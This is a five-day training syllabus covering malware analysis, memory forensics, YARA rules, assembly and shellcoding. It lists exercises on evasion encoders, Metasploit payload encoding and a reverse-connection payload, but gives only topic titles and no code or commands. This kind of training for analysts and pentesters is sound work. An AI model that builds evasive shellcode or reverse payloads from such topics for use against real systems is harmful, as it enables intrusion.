Acquire general knowledge of how malware works / Discover a static and dynamic analysis methodology / Create encoded loads
Day 1 morning
❏ Section 1 – State of the art
❏ Introduction
❏ History
❏ Vectors of infection
❏ Compromise
❏ Business impacts
❏ Conventional defences
Day 1 afternoon
❏ Section 2 – System basics
❏ Boot sequence
❏ Dissection of a process
❏ Dissection of an executable
❏ Memory management
❏ Common techniques
Obfuscation, packers, encoders (evasion)
❏ Section 2 – Environment
❏ Infrastructure
❏ Good practices and creation of a lab
Day 2 morning
Section 3 – Analysis tools
❏ Presentation of the analysis tools
❏ Tutorials1 / Discovery of the Sysinternals suite
(Procmon, Procexp)
❏ Static analysis
❏ Dynamic analysis
❏ Introduction to the FLARE Mandiant suite
❏ Tutorials 2 / Analysis of a PDF
❏ Tutorials 3 / Meterpreter / Unicorn / Macros analysis
❏ Sandbox
❏ VirusTotal
❏ Cuckoo
❏ AnyRun
❏ Tutorials 4 / Analysis of a load in a SandBox
Day 2 afternoon
❏ Practical Work 1 / Case study – Analysis of an attack andd writing a report
❏ Signatures
❏ YARA
❏ Creating rules
❏ YARA implementation
❏ Exchange platforms
❏ Tutorials 5 / Signer of the malware
Day 3 morning
❏ Section 4 – Analysis of memory dumps
❏ Acquisition
❏ Volatility
❏ Processus
❏ DLLs
❏ Ruches
❏ Injections
❏ Connections
❏ Practical Work 2 / Analysis of memory dumps
Day 3 afternoon
❏ Section 5 – Introduction to the assembler (ia-32)
❏ Introduction
❏ Registres
❏ Flags
❏ Instructions
❏ La pile
❏ Tutorials 6 / First programs
❏ Hello World (Write)
❏ Loops
❏ Execve (/bin/sh)
Day 4 morning
❏ Section 6 – Shellcoding
❏ Introduction to GDB
❏ Useful commands
❏ Shellcode stack method
❏ Shellcode method Jmp-Call-Pop
❏ The encoders
❏ Stagers
Jour 4 afternoon
❏ Practical Work 3 / Creating an XOR encoder
Day 5
❏ Where to find shellcodes
❏ Encoding existing shellcodes (Metasploit)
❏ Practical Work 5 / Load Reverse
General programming and system/network knowledge
Developers / Pentesters / Administrators / Analysts